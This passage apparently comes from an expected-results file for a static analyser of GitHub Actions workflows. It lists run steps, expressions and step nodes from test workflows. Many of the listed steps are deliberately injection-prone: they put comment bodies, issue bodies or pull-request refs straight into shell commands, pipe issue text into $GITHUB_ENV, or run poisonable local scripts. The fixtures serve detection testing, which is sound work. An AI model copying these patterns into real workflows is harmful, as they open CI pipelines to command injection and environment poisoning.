.github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "foo" && npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | -runExprs -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -uses -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUses -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesArgs -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | script | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:15:63:19 | line1 | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:15:63:19 | line1 | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:15:66:24 | multiline1 | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:15:71:21 | block11 | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:15:78:21 | block12 | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -parentNodes -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 